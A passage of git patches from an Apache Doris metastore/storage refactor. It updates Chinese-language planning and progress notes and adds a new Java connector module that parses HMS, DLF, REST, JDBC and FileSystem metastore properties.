a/plan-doc/metastore-storage-refactor/PROGRESS.md +++ b/plan-doc/metastore-storage-refactor/PROGRESS.md @@ -22,11 +22,14 @@ - **FU-T03(R-006,本次 commit)**:4 个 `*FileSystemPropertiesTest` 各加 1 个调优默认守护测试(BE map + Hadoop map,字面量期望值非常量);S3 50/3000/1000、OSS/COS/OBS 100/10000/10000(已核 legacy parity);mutation 改 4 个 `DEFAULT_MAX_CONNECTIONS`→ 4 测全红证有效。S3 15/0·OSS 14/0·COS 13/0·OBS 13/0 + sibling 绿、checkstyle 0。纯 test-only。 - ⚠️ docker e2e 未跑(两者真闸均在 P1-T06)。 - **FU-T01 ✅(2026-06-17,D-010,commit `a426648f209`)**:`fe-filesystem-hdfs` HDFS typed BE model(**R-007 闭环**)。78/0 + 对抗 review `wf_5db99e32-2ad` 清场。 -- **下一步 = `P2-T01`(新建 fe-connector-metastore-api)**(用户 2026-06-18 **D-012:跳过/推迟 P1-T06 docker,直接进 P2**)。**P1-T06 非取消而是推迟**——其 docker 验证与 P2-T05 的 docker 5-flavor 合并为一次跑(同一 `enablePaimonTest=true` 套件)。R-006/R-007/R-008 已在 UT/mutation 层闭环。**P2-T01**:新模块(fe-foundation + fe-filesystem-api 依赖)= `MetaStoreProperties`(`providerName()` + 能力方法,无枚举,D-006)+ HMS/DLF/REST/JDBC/FileSystem 子接口(中立类型)。实施前 recon 设计 §3.1 + D-006/D-004 + fe-core metastore 包 + paimon `PaimonCatalogFactory`。⚠️ docker 全程未跑(留 P2-T05)。 +- **P3a-T01 facts-carrier ✅ + P2-T01 ✅ 完成(2026-06-18,进入 P2)**(用户 D-012 跳过/推迟 P1-T06 docker → P2-T05 合并跑): + - **P3a-T01 facts-carrier(commit `51df4fccd01`,D-013)**:新顶层叶子 `fe-kerberos` 的零依赖 facts 切片 `AuthType`(SIMPLE/KERBEROS+fromString) + `KerberosAuthSpec`(principal/keytab 值对象);AuthTypeTest 3/0 + KerberosAuthSpecTest 3/0、checkstyle 0。authenticator 机制(hadoop)待 P2-T02 增量补。 + - **P2-T01(本次 commit)**:新模块 `fe-connector-metastore-api`(`org.apache.doris.connector.metastore`)= `MetaStoreProperties`(providerName + 能力方法默认 false + raw/matched,无枚举 D-006)+ HMS/DLF/REST/JDBC/FileSystem 5 子接口(中立;HMS 用 fe-kerberos facts);依赖 fe-kerberos(D-013);契约测试 3/0、checkstyle 0、import-gate exit 0。未建 Glue/S3Tables(留扩展)。 +- **下一步 = `P2-T02`(新建 fe-connector-metastore-spi)**:5 个 `*MetastoreBackend.parse(raw, storageList)` + `MetaStoreProvider

    ` SPI(`supports()` 自识别)+ 5 内置 provider + `META-INF/services` + `MetaStoreProviders.bind` 派发(D-006,镜像 FileSystemProvider/FileSystemPluginManager)+ `@ConnectorProperty` typed holder;**来源 = 上移 paimon `PaimonCatalogFactory` 手抄逻辑去 fe-core 化**;**此处增量补 fe-kerberos authenticator 机制子集**(hadoop 依赖 + trino KerberosTicketUtils→JDK,P3a-T01 续)。设计 §3.2 / T2 等价。⚠️ docker 全程未跑(留 P2-T05)。 - P0-T01 ✅|P0-T02 ✅(bindAll)|P1-T01 ✅(getStorageProperties 默认方法 + 边)|P1-T02 ✅(getStorageProperties 实现 + FileSystemFactory accessor)|P1-T03 ✅(paimon storage 配置 `applyStorageConfig` 改走 `toHadoopConfigurationMap()`)|P1-T04 ✅(paimon BE 静态凭据改走 `getStorageProperties().toBackendProperties().toMap()`,全量切)|**P1-T05 ✅**(删 paimon→fe-property pom 依赖边 + grep 归零闸)。 - ✅ **连接器 storage + BE 凭据路全切 fe-filesystem-api typed,且 paimon→fe-property 依赖边已断**:catalog 路 `PaimonConnector.buildStorageHadoopConfig()→toHadoopConfigurationMap()`;BE 扫描分片路 `PaimonScanPlanProvider` 遍历 `getStorageProperties()→toBackendProperties().toMap()`→`location.*`(vended overlays static 保序不动)。paimon 已零 `org.apache.doris.property/datasource` import + pom 无 fe-property 依赖(fe-property 变 0 消费者孤儿,本次不物理删 D-005)。 - ⚠️ **已知接受回归(fe-filesystem typed BE model 不全,超 P1 白名单)**:HDFS-warehouse paimon BE 配置丢(DV-004/R-007/FU-T01);无凭据 OSS/COS/OBS 缺 `AWS_CREDENTIALS_PROVIDER_TYPE=ANONYMOUS`(R-008/FU-T02)。均用户接受、follow-up 修、docker P1-T06 会暴露(非新 bug)。 -- ▶ **下一步**:**P2-T01**(新建 fe-connector-metastore-api)。**P1-T06 推迟**(D-012,docker 验证折进 P2-T05 一次跑)。 +- ▶ **下一步**:**P2-T02**(新建 fe-connector-metastore-spi:解析器 + MetaStoreProvider SPI/ServiceLoader + 增量补 fe-kerberos authenticator 机制)。**P3a-T01 facts-carrier ✅ + P2-T01 ✅**(2026-06-18)。**P1-T06 推迟**(D-012,docker 验证折进 P2-T05 一次跑)。 ## 阻塞 / 待决 - ✅ 范围已获批(2026-06-17)= **P0+P1(storage 收口),做到 P1-T06 gate 停**。 @@ -36,6 +39,7 @@ --- ## 最近动态(最近 7 天) +- 2026-06-18 **进入 P2(metastore SPI):P3a-T01 facts-carrier ✅ + P2-T01 ✅**(D-012 跳过/推迟 P1-T06 docker;D-013 用户选 fe-kerberos 先建)。**P3a-T01 facts 切片**(commit `51df4fccd01`)新建顶层叶子 `fe-kerberos`(零依赖)= `AuthType`(SIMPLE/KERBEROS, fromString 仅 "kerberos" 命中) + `KerberosAuthSpec`(principal/keytab 不可变值对象, hasCredentials 需两者);6 测绿、checkstyle 0。**P2-T01**(本次 commit)新建 `fe-connector-metastore-api`:`MetaStoreProperties`(providerName + needsStorage/needsVendedCredentials 默认 false + validate no-op + raw/matched,**无 MetaStoreType 枚举** D-006)+ HMS/DLF/REST/JDBC/FileSystem 5 子接口(中立 Map/标量;HMS 经 fe-kerberos `AuthType`/`Optional`);依赖仅 fe-kerberos(D-013;fe-foundation/fe-filesystem-api 留 spi 用时再加);契约测试 3/0、checkstyle 0、import-gate exit 0、无 fe-core 禁包 import。未建 Glue/S3Tables(留扩展)。⚠️ docker 全程未跑(留 P2-T05)。**下一步 P2-T02**。 - 2026-06-18 **FU-T02 ✅ + FU-T03 ✅**(D-011,P1-T06 前补齐 fe-filesystem 对象存储;R-008 + R-006 闭环):**FU-T02**(commit `e5b088b14e7`)`Oss/Cos/ObsFileSystemProperties.toBackendKv()` 内联镜像 legacy `AbstractS3CompatibleProperties` 基类条件(ak/sk 皆空发 `AWS_CREDENTIALS_PROVIDER_TYPE=ANONYMOUS`、否则省略);**DV-005** 不加字段/枚举(legacy OSS/COS/OBS 无可配置 provider type、`S3CredentialsProviderType` 在 s3 模块不可达,加字段反更不贴 legacy + 须扩白名单)——比原 D-011「加字段镜像 S3」更简更贴 legacy(用户本轮指令「处理逻辑一致」)。TDD RED→GREEN(3 ANONYMOUS 测 + 3 有凭据 assertNull 守省略)。**FU-T03** 4 个 `*PropertiesTest` 加调优默认守护(BE+Hadoop map,字面量期望值;S3 50/3000/1000、OSS/COS/OBS 100/10000/10000,已核 legacy `S3Properties.Env`/`OSS|COS|OBSProperties` parity);mutation 改 4 个 `DEFAULT_MAX_CONNECTIONS`→4 测全红证守护。验证:S3 15/0·OSS 14/0·COS 13/0·OBS 13/0 + 全 sibling suite 绿、checkstyle 0×4、`git diff` 白名单干净。⚠️ docker e2e 未跑(真闸 P1-T06)。**下一步 P1-T06**(R-006/7/8 全闭环 → 干净全绿验收)。 - 2026-06-17 **FU-T01 ✅**(D-010 授权,HDFS typed BE model 修 DV-004/R-007):新建 `fe-filesystem-hdfs` 的 `HdfsFileSystemProperties`(BE-only,忠实移植 legacy `initBackendConfigProperties`)+ `HdfsConfigFileLoader`(XML 资源)+ provider `bind()`/`create(P)`(`create(Map)`/`supports()` 不动)+ pom `fe-foundation`/`commons-lang3`。kerberos=**K1**(BE-key 字符串内联,不建 fe-kerberos,不碰 create()-side authenticator;用户 AskUserQuestion 选)。**真 parity 在 UT 落地**(非 paimon Option C):25 golden parity 钉 `toMap()`==legacy BE 键集(simple/kerberos/HA/username/uri-derive/XML/sysprop…)。验证 fe-filesystem-hdfs **78/0** + checkstyle 0 + RED/GREEN(mutation 关 kerberos 块→红) + fe-core `-am compile` 绿 + `git diff` 白名单干净。**对抗 review `wf_5db99e32-2ad`(27 agent,4 lens+verify)**:清场(packaging 无跨 loader、parity byte-level 复核、BE-only 无新 catalog 路回归、强 oss-hdfs 断言被 verify 推翻),3 实质修(①malformed-uri swallow→fail-loud 对齐 legacy;②2 处 stale 注释[bindAll javadoc/paimon KNOWN GAP 1];③+11 测试)。**F1**(XML config-dir 未接 `Config.hadoop_config_dir`)用户选「**现在接好**」=fe-core `FileSystemFactory` setProperty 桥(leaf 读 sysprop)。**额外触碰 3 已白名单文件**(FileSystemFactory/FileSystemPluginManager/PaimonScanPlanProvider,均 project-owned 微改/注释)。残留 oss-hdfs JindoFS 凭据=独立 FU。⚠️ docker e2e 未跑(HA/kerberized 真闸 P1-T06)。 - 2026-06-17 **P1-T05 ✅**(断开 paimon→fe-property 依赖边):删 `fe-connector-paimon/pom.xml` 的 `fe-property` 依赖块(仅删 pom 边——import/call 已在 P1-T03 清 DV-003-b)。recon 确认 paimon src(main+test)`org.apache.doris.property` 已 ZERO、唯一物理耦合是 pom :72,其余 `fe-property` 字样皆历史注释(不动)。**RED/GREEN=构建闸**(无 UT 可写):删后全模块编译+全 UT 仍绿=证无隐藏 transitive 断裂。验证:paimon 全模块 **293/0/0/1skip**、grep 归零、pom 无 fe-property、checkstyle 0、import-gate PASS、白名单干净(仅 pom)。**fe-property 变 0 消费者孤儿(本次不物理删,D-005)**。⚠️ docker e2e 未跑。仅剩 P1-T06 验证即 P1 收口。 diff --git a/plan-doc/metastore-storage-refactor/tasks.md b/plan-doc/metastore-storage-refactor/tasks.md index f7135b14d5e7d3..ec91ae57765c6d 100644 --- a/plan-doc/metastore-storage-refactor/tasks.md +++ b/plan-doc/metastore-storage-refactor/tasks.md @@ -81,10 +81,11 @@ ## P2 — MetaStore Property SPI + paimon adapter(纯新增/迁移) -### P2-T01 ⬜ 新建 fe-connector-metastore-api -- **做什么**:新模块(依赖 fe-foundation + fe-filesystem-api):`MetaStoreProperties`(`String providerName()` + 能力方法 `needsStorage()`/`needsVendedCredentials()`,**无 per-backend 枚举**,D-006)+ 子接口 **HMS/DLF/REST/JDBC/FileSystem**(中立 Map/标量,不暴露 HiveConf/SDK 类型)。**不实现 Glue/S3Tables**(iceberg/hive 专用,留扩展)。 +### P2-T01 ✅(2026-06-18 完成)新建 fe-connector-metastore-api +- **完成态(2026-06-18,commit 待提交)**:新模块 `fe-connector-metastore-api`(`org.apache.doris.connector.metastore`)= `MetaStoreProperties`(`providerName()` + 能力方法 `needsStorage()`/`needsVendedCredentials()` 默认 false + `validate()` 默认 no-op + `rawProperties()`/`matchedProperties()`,**无 `MetaStoreType` 枚举**,D-006)+ 5 子接口 **HMS/DLF/REST/JDBC/FileSystem**(中立 Map/标量;`HmsMetaStoreProperties` 用 fe-kerberos `AuthType`+`Optional`)。**未建 Glue/S3Tables**(留扩展——加子接口零改 api/spi)。**依赖 = fe-kerberos**(D-013;非设计 header 原写的 fe-foundation+fe-filesystem-api——api 纯接口不用 @ConnectorProperty/StorageProperties,那些留 spi 用时再加,Rule 2/3 外科)。pom 镜像 `fe-connector-api`(copy-plugin-deps phase=none,编入 fe-core 非插件部署);注册进 `fe-connector/pom.xml`(fe-connector-spi 之后)。**TDD**:`MetaStorePropertiesContractTest` 3/0(能力默认 false[Rule 9 intent]/可 override/HMS 子接口承载 fe-kerberos facts)。验证:BUILD SUCCESS、checkstyle 0、import-gate exit 0、无 fe-core 禁包 import、`git diff` 白名单干净(仅 fe-connector/pom.xml + 新模块)。 +- **做什么**:新模块(依赖 fe-foundation + fe-filesystem-api):`MetaStoreProperties`(`String providerName()` + 能力方法 `needsStorage()`/`needsVendedCredentials()`,**无 per-backend 枚举**,D-006)+ 子接口 **HMS/DLF/REST/JDBC/FileSystem**(中立 Map/标量,不暴露 HiveConf/SDK 类型)。**不实现 Glue/S3Tables**(iceberg/hive 专用,留扩展)。**[D-013 修订:依赖 fe-kerberos(AuthType/KerberosAuthSpec);fe-foundation/fe-filesystem-api 当前 api 未用,留 spi]** - **验收**:模块编译;接口签名对齐设计 §3.1(**确认无 `MetaStoreType` 枚举**);新模块声明进 `fe-connector/pom.xml`。 -- **依赖**:无。设计 §4 P2-1 / §3.1 / **D-006**。 +- **依赖**:~~无~~ **fe-kerberos(D-013,P3a-T01 facts-carrier 先建)**。设计 §4 P2-1 / §3.1 / **D-006 / D-013**。 ### P2-T02 ⬜ 新建 fe-connector-metastore-spi(共享后端解析器 + Provider 发现) - **做什么**:新模块(依赖 metastore-api + fe-foundation + fe-filesystem-api):`Hms/Dlf/Rest/Jdbc/FileSystem MetastoreBackend.parse(raw, storageList)` + `JdbcDriverSupport` + `@ConnectorProperty` typed holders;**+ `MetaStoreProvider

    ` SPI(`supports(Map)` 自识别 + `bind`)+ 5 个内置 provider + 各自 `META-INF/services` + `MetaStoreProviders.bind(...)` 派发**(D-006,镜像 `FileSystemProvider`/`FileSystemPluginManager`)。来源 = 上移 paimon 现有 `PaimonCatalogFactory` 手抄逻辑(去 fe-core 化)。**fe-core 旧类不动**。 From 039f48e4275046b00f9ca90e0e16199343df352d Mon Sep 17 00:00:00 2001 From: morningman Date: Thu, 18 Jun 2026 05:51:09 +0800 Subject: [PATCH 091/128] =?UTF-8?q?docs(storage-refactor):=20HANDOFF=20?= =?UTF-8?q?=E2=80=94=20fix=20P2-T01=20commit=20ref=20(44d1fec4dcb),=20not?= =?UTF-8?q?=20pending?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit Co-Authored-By: Claude Opus 4.8 (1M context) --- plan-doc/metastore-storage-refactor/HANDOFF.md | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/plan-doc/metastore-storage-refactor/HANDOFF.md b/plan-doc/metastore-storage-refactor/HANDOFF.md index d3a5933bc25bbc..7b3de0c8a5421c 100644 --- a/plan-doc/metastore-storage-refactor/HANDOFF.md +++ b/plan-doc/metastore-storage-refactor/HANDOFF.md @@ -11,7 +11,7 @@ **更新人**:Claude(Opus 4.8) > **本 session P2 进度补注(最新在最前)**: -> - **P2-T01 ✅(commit 待提交)**:新建 `fe-connector-metastore-api`(`org.apache.doris.connector.metastore`)= `MetaStoreProperties`(`providerName()`+能力方法 `needsStorage()`/`needsVendedCredentials()` 默认 false+`validate()` no-op+`rawProperties()`/`matchedProperties()`,**无 `MetaStoreType` 枚举** D-006)+ 5 子接口 HMS/DLF/REST/JDBC/FileSystem(中立 Map/标量;`HmsMetaStoreProperties` 用 fe-kerberos `AuthType`+`Optional`)。**依赖仅 fe-kerberos**(D-013;fe-foundation/fe-filesystem-api api 纯接口未用→留 spi)。pom 镜像 fe-connector-api(copy-plugin-deps none);注册 fe-connector/pom.xml。**未建 Glue/S3Tables**(留扩展)。`MetaStorePropertiesContractTest` 3/0、checkstyle 0、import-gate exit 0、无 fe-core 禁包 import。 +> - **P2-T01 ✅(commit `44d1fec4dcb`)**:新建 `fe-connector-metastore-api`(`org.apache.doris.connector.metastore`)= `MetaStoreProperties`(`providerName()`+能力方法 `needsStorage()`/`needsVendedCredentials()` 默认 false+`validate()` no-op+`rawProperties()`/`matchedProperties()`,**无 `MetaStoreType` 枚举** D-006)+ 5 子接口 HMS/DLF/REST/JDBC/FileSystem(中立 Map/标量;`HmsMetaStoreProperties` 用 fe-kerberos `AuthType`+`Optional`)。**依赖仅 fe-kerberos**(D-013;fe-foundation/fe-filesystem-api api 纯接口未用→留 spi)。pom 镜像 fe-connector-api(copy-plugin-deps none);注册 fe-connector/pom.xml。**未建 Glue/S3Tables**(留扩展)。`MetaStorePropertiesContractTest` 3/0、checkstyle 0、import-gate exit 0、无 fe-core 禁包 import。 > - **P3a-T01 facts-carrier ✅(commit `51df4fccd01`,D-013)**:新顶层叶子 `fe-kerberos`(**零生产依赖**)facts 切片 `AuthType`(SIMPLE/KERBEROS, `fromString` 仅 "kerberos" 命中余皆 SIMPLE) + `KerberosAuthSpec`(client principal+keytab 不可变值对象, `hasCredentials()` 需两者非空;HMS service principal 不在此=HiveConf override)。6 测绿、checkstyle 0。**authenticator 机制子集(hadoop 依赖 + trino KerberosTicketUtils→JDK)= 待 P2-T02 增量补**。 > - **决策**:D-012(跳过/推迟 P1-T06 docker,验证折进 P2-T05)|D-013(kerberos facts 归 fe-kerberos、先建;metastore-api 依赖 fe-kerberos)。 > - ⚠️ **docker e2e 全程未跑**(留 P2-T05)。 From 7ea63528bc4b2182f565684244ef4fb722151f5e Mon Sep 17 00:00:00 2001 From: morningman Date: Thu, 18 Jun 2026 07:39:52 +0800 Subject: [PATCH 092/128] [P2-T02] fe-connector-metastore-spi: shared metastore parsers + MetaStoreProvider SPI New module fe-connector-metastore-spi implementing the fe-connector-metastore-api contracts: 5 backend connection-fact parsers (HMS/DLF/REST/JDBC/FileSystem) + MetaStoreProvider

    SPI (supports(Map) self-id + first-hit ServiceLoader dispatch via MetaStoreProviders.bind) + MetaStoreParseUtils + JdbcDriverSupport.resolveDriverUrl + AbstractMetaStoreProperties + 5 providers + one META-INF/services file. Source = up-moving the paimon PaimonCatalogFactory hand-copied logic, de-fe-core-ified (HiveConf -> neutral Map, authenticator -> KerberosAuthSpec facts). fe-core legacy Paimon*MetaStoreProperties untouched. This builds the module + tests only; the paimon adapter cutover is P2-T03. Decisions (AskUserQuestion): - DV-006: fe-kerberos is a compile-dep only, ZERO new code. The HMS parser produces neutral string keys + AuthType.fromString + new KerberosAuthSpec(principal,keytab); the real UGI.doAs stays FE-side via ctx.executeAuthenticated. (Recon refuted the HANDOFF's "incrementally add the authenticator mechanism subset".) - DV-007: storage arrives as a neutral Map storageHadoopConfig (not List); the module stays hadoop/fs-free (no fe-filesystem-api dep). The parser owns the storage overlay so the kerberos-after-storage order is preserved. - D-006: no per-backend enum, no central switch. - D-4: HMS validate() restores the two legacy ParamRules (forbidIf-simple/requireIf- kerberos) the paimon hand-copy omits; CASE-SENSITIVE Objects.equals, preserving the asymmetry vs the conf-build branch's equalsIgnoreCase. Adversarial review (wf_2ddae04d-cf9, 4 lens + verify): 0 BLOCKER. Fixed MAJOR = REST token-provider equalsIgnoreCase -> "dlf".equals (paimon hand-copy latent bug; legacy ParamRules is authoritative). FS supports() -> type==null||equalsIgnoreCase (drop trim asymmetry, match legacy reject-on-malformed). Added 12 coverage tests (storage re-key, clobber-via-storage-channel, alias-first-wins, username-overlay, DLF S3-only reject, dispatch instanceof, ...). 2 honest api javadoc corrections (getDriverUrl raw, needsStorage FS). Verified: spi 41/0, checkstyle 0, import-gate exit 0, no forbidden fe-core imports, 3 mutations RED->GREEN. docker e2e NOT run (T2 gate at P2-T05). Co-Authored-By: Claude Opus 4.8 (1M context) --- .../metastore/JdbcMetaStoreProperties.java | 7 +- .../metastore/MetaStoreProperties.java | 6 +- .../fe-connector-metastore-spi/pom.xml | 101 ++++++++ .../spi/AbstractMetaStoreProperties.java | 62 +++++ .../metastore/spi/JdbcDriverSupport.java | 63 +++++ .../metastore/spi/MetaStoreParseUtils.java | 121 +++++++++ .../metastore/spi/MetaStoreProvider.java | 74 ++++++ .../metastore/spi/MetaStoreProviders.java | 71 ++++++ .../spi/dlf/DlfMetaStorePropertiesImpl.java | 156 ++++++++++++ .../spi/dlf/DlfMetaStoreProvider.java | 50 ++++ .../fs/FileSystemMetaStorePropertiesImpl.java | 63 +++++ .../spi/fs/FileSystemMetaStoreProvider.java | 52 ++++ .../spi/hms/HmsMetaStorePropertiesImpl.java | 210 +++++++++++++++ .../spi/hms/HmsMetaStoreProvider.java | 50 ++++ .../spi/jdbc/JdbcMetaStorePropertiesImpl.java | 111 ++++++++ .../spi/jdbc/JdbcMetaStoreProvider.java | 51 ++++ .../spi/rest/RestMetaStorePropertiesImpl.java | 111 ++++++++ .../spi/rest/RestMetaStoreProvider.java | 51 ++++ ....connector.metastore.spi.MetaStoreProvider | 21 ++ .../spi/MetaStoreParseUtilsTest.java | 94 +++++++ .../spi/MetaStoreProvidersDispatchTest.java | 115 +++++++++ .../spi/dlf/DlfMetaStorePropertiesTest.java | 135 ++++++++++ .../fs/FileSystemMetaStorePropertiesTest.java | 49 ++++ .../spi/hms/HmsMetaStorePropertiesTest.java | 239 ++++++++++++++++++ .../spi/jdbc/JdbcMetaStorePropertiesTest.java | 100 ++++++++ .../spi/rest/RestMetaStorePropertiesTest.java | 94 +++++++ fe/fe-connector/pom.xml | 1 + .../metastore-storage-refactor/HANDOFF.md | 34 ++- .../metastore-storage-refactor/PROGRESS.md | 8 +- .../deviations-log.md | 15 ++ plan-doc/metastore-storage-refactor/tasks.md | 13 +- 31 files changed, 2305 insertions(+), 23 deletions(-) create mode 100644 fe/fe-connector/fe-connector-metastore-spi/pom.xml create mode 100644 fe/fe-connector/fe-connector-metastore-spi/src/main/java/org/apache/doris/connector/metastore/spi/AbstractMetaStoreProperties.java create mode 100644 fe/fe-connector/fe-connector-metastore-spi/src/main/java/org/apache/doris/connector/metastore/spi/JdbcDriverSupport.java create mode 100644 fe/fe-connector/fe-connector-metastore-spi/src/main/java/org/apache/doris/connector/metastore/spi/MetaStoreParseUtils.java create mode 100644 fe/fe-connector/fe-connector-metastore-spi/src/main/java/org/apache/doris/connector/metastore/spi/MetaStoreProvider.java create mode 100644 fe/fe-connector/fe-connector-metastore-spi/src/main/java/org/apache/doris/connector/metastore/spi/MetaStoreProviders.java create mode 100644 fe/fe-connector/fe-connector-metastore-spi/src/main/java/org/apache/doris/connector/metastore/spi/dlf/DlfMetaStorePropertiesImpl.java create mode 100644 fe/fe-connector/fe-connector-metastore-spi/src/main/java/org/apache/doris/connector/metastore/spi/dlf/DlfMetaStoreProvider.java create mode 100644 fe/fe-connector/fe-connector-metastore-spi/src/main/java/org/apache/doris/connector/metastore/spi/fs/FileSystemMetaStorePropertiesImpl.java create mode 100644 fe/fe-connector/fe-connector-metastore-spi/src/main/java/org/apache/doris/connector/metastore/spi/fs/FileSystemMetaStoreProvider.java create mode 100644 fe/fe-connector/fe-connector-metastore-spi/src/main/java/org/apache/doris/connector/metastore/spi/hms/HmsMetaStorePropertiesImpl.java create mode 100644 fe/fe-connector/fe-connector-metastore-spi/src/main/java/org/apache/doris/connector/metastore/spi/hms/HmsMetaStoreProvider.java create mode 100644 fe/fe-connector/fe-connector-metastore-spi/src/main/java/org/apache/doris/connector/metastore/spi/jdbc/JdbcMetaStorePropertiesImpl.java create mode 100644 fe/fe-connector/fe-connector-metastore-spi/src/main/java/org/apache/doris/connector/metastore/spi/jdbc/JdbcMetaStoreProvider.java create mode 100644 fe/fe-connector/fe-connector-metastore-spi/src/main/java/org/apache/doris/connector/metastore/spi/rest/RestMetaStorePropertiesImpl.java create mode 100644 fe/fe-connector/fe-connector-metastore-spi/src/main/java/org/apache/doris/connector/metastore/spi/rest/RestMetaStoreProvider.java create mode 100644 fe/fe-connector/fe-connector-metastore-spi/src/main/resources/META-INF/services/org.apache.doris.connector.metastore.spi.MetaStoreProvider create mode 100644 fe/fe-connector/fe-connector-metastore-spi/src/test/java/org/apache/doris/connector/metastore/spi/MetaStoreParseUtilsTest.java create mode 100644 fe/fe-connector/fe-connector-metastore-spi/src/test/java/org/apache/doris/connector/metastore/spi/MetaStoreProvidersDispatchTest.java create mode 100644 fe/fe-connector/fe-connector-metastore-spi/src/test/java/org/apache/doris/connector/metastore/spi/dlf/DlfMetaStorePropertiesTest.java create mode 100644 fe/fe-connector/fe-connector-metastore-spi/src/test/java/org/apache/doris/connector/metastore/spi/fs/FileSystemMetaStorePropertiesTest.java create mode 100644 fe/fe-connector/fe-connector-metastore-spi/src/test/java/org/apache/doris/connector/metastore/spi/hms/HmsMetaStorePropertiesTest.java create mode 100644 fe/fe-connector/fe-connector-metastore-spi/src/test/java/org/apache/doris/connector/metastore/spi/jdbc/JdbcMetaStorePropertiesTest.java create mode 100644 fe/fe-connector/fe-connector-metastore-spi/src/test/java/org/apache/doris/connector/metastore/spi/rest/RestMetaStorePropertiesTest.java diff --git a/fe/fe-connector/fe-connector-metastore-api/src/main/java/org/apache/doris/connector/metastore/JdbcMetaStoreProperties.java b/fe/fe-connector/fe-connector-metastore-api/src/main/java/org/apache/doris/connector/metastore/JdbcMetaStoreProperties.java index ea9e1c61e0e0ac..f0c2d00e034a9f 100644 --- a/fe/fe-connector/fe-connector-metastore-api/src/main/java/org/apache/doris/connector/metastore/JdbcMetaStoreProperties.java +++ b/fe/fe-connector/fe-connector-metastore-api/src/main/java/org/apache/doris/connector/metastore/JdbcMetaStoreProperties.java @@ -32,7 +32,12 @@ public interface JdbcMetaStoreProperties extends MetaStoreProperties { /** The JDBC password, or empty when not configured. */ String getPassword(); - /** The resolved driver jar URL, or empty when the engine-provided driver is used. */ + /** + * The configured driver jar URL (raw, alias-resolved), or empty when the engine-provided driver + * is used. Resolve it to a full, scheme-bearing URL via the spi's + * {@code JdbcDriverSupport.resolveDriverUrl(url, env)} with the engine environment (the same + * resolution the FE driver registration and the BE-bound options apply). + */ String getDriverUrl(); /** The JDBC driver class name, or empty when not configured. */ diff --git a/fe/fe-connector/fe-connector-metastore-api/src/main/java/org/apache/doris/connector/metastore/MetaStoreProperties.java b/fe/fe-connector/fe-connector-metastore-api/src/main/java/org/apache/doris/connector/metastore/MetaStoreProperties.java index 89b6eb4fb25dd0..9be66dce84c05e 100644 --- a/fe/fe-connector/fe-connector-metastore-api/src/main/java/org/apache/doris/connector/metastore/MetaStoreProperties.java +++ b/fe/fe-connector/fe-connector-metastore-api/src/main/java/org/apache/doris/connector/metastore/MetaStoreProperties.java @@ -39,8 +39,10 @@ public interface MetaStoreProperties { String providerName(); /** - * Whether this backend needs the bound {@code List} to be supplied during - * parsing (FileSystem/DLF do; HMS/REST/JDBC do not). Replaces a per-backend enum switch. + * Whether this backend needs the bound storage config supplied. HMS/DLF overlay it into the metastore + * conf during parse, in the parity-critical order (e.g. before the HMS kerberos block); FileSystem + * needs it bound for the connector to apply at catalog-build time. REST/JDBC do not. Replaces a + * per-backend enum switch. */ default boolean needsStorage() { return false; diff --git a/fe/fe-connector/fe-connector-metastore-spi/pom.xml b/fe/fe-connector/fe-connector-metastore-spi/pom.xml new file mode 100644 index 00000000000000..e262d4304745ab --- /dev/null +++ b/fe/fe-connector/fe-connector-metastore-spi/pom.xml @@ -0,0 +1,101 @@ + + + + 4.0.0 + + + org.apache.doris + fe-connector + ${revision} + ../pom.xml + + + fe-connector-metastore-spi + jar + Doris FE Connector Metastore SPI + + Shared metastore connection-fact parsers + provider discovery for the + fe-connector-metastore-api contracts. Each backend (HMS/DLF/REST/JDBC/ + FileSystem) parses the raw property map (+ a pre-computed neutral storage + Hadoop-config map) into the corresponding *MetaStoreProperties facts, and + is discovered by MetaStoreProvider.supports(Map) + ServiceLoader (D-006, + mirroring fe-filesystem's FileSystemProvider). Holds only neutral Map/ + scalar facts; never leaks HiveConf/Hadoop/SDK types (those are assembled + connector-side). Storage arrives as an opaque string map so this module + stays hadoop/fs-free (DV-007); fe-kerberos supplies the neutral AuthType / + KerberosAuthSpec value objects (DV-006, no new code there). + + + + + ${project.groupId} + fe-connector-metastore-api + ${project.version} + + + + ${project.groupId} + fe-extension-spi + ${project.version} + + + + ${project.groupId} + fe-foundation + ${project.version} + + + + ${project.groupId} + fe-kerberos + ${project.version} + + + + org.apache.commons + commons-lang3 + + + org.junit.jupiter + junit-jupiter + test + + + + + doris-fe-connector-metastore-spi + + + org.apache.maven.plugins + maven-dependency-plugin + + + + copy-plugin-deps + none + + + + + + diff --git a/fe/fe-connector/fe-connector-metastore-spi/src/main/java/org/apache/doris/connector/metastore/spi/AbstractMetaStoreProperties.java b/fe/fe-connector/fe-connector-metastore-spi/src/main/java/org/apache/doris/connector/metastore/spi/AbstractMetaStoreProperties.java new file mode 100644 index 00000000000000..ec311d4eaf6a14 --- /dev/null +++ b/fe/fe-connector/fe-connector-metastore-spi/src/main/java/org/apache/doris/connector/metastore/spi/AbstractMetaStoreProperties.java @@ -0,0 +1,62 @@ +// Licensed to the Apache Software Foundation (ASF) under one +// or more contributor license agreements. See the NOTICE file +// distributed with this work for additional information +// regarding copyright ownership. The ASF licenses this file +// to you under the Apache License, Version 2.0 (the +// "License"); you may not use this file except in compliance +// with the License. You may obtain a copy of the License at +// +// http://www.apache.org/licenses/LICENSE-2.0 +// +// Unless required by applicable law or agreed to in writing, +// software distributed under the License is distributed on an +// "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY +// KIND, either express or implied. See the License for the +// specific language governing permissions and limitations +// under the License. + +package org.apache.doris.connector.metastore.spi; + +import org.apache.doris.connector.metastore.MetaStoreProperties; +import org.apache.doris.foundation.property.ConnectorProperty; + +import org.apache.commons.lang3.StringUtils; + +import java.util.Map; + +/** + * Common state for the backend property impls: the raw map, the shared {@code warehouse} property + * (legacy {@code AbstractPaimonProperties.warehouse}, required by all paimon flavors), and the + * {@code matchedProperties()} derivation. Subclasses bind their {@code @ConnectorProperty} fields via + * {@code ConnectorPropertiesUtils.bindConnectorProperties} in their {@code of(...)} factory AFTER + * construction (so subclass field initializers do not clobber the bound values). + */ +public abstract class AbstractMetaStoreProperties implements MetaStoreProperties { + + @ConnectorProperty(names = {"warehouse"}, required = false, + description = "Warehouse root location for the catalog.") + protected String warehouse = ""; + + protected final Map raw; + + protected AbstractMetaStoreProperties(Map raw) { + this.raw = raw; + } + + @Override + public Map rawProperties() { + return raw; + } + + @Override + public Map matchedProperties() { + return MetaStoreParseUtils.matchedProperties(this, raw); + } + + /** Shared 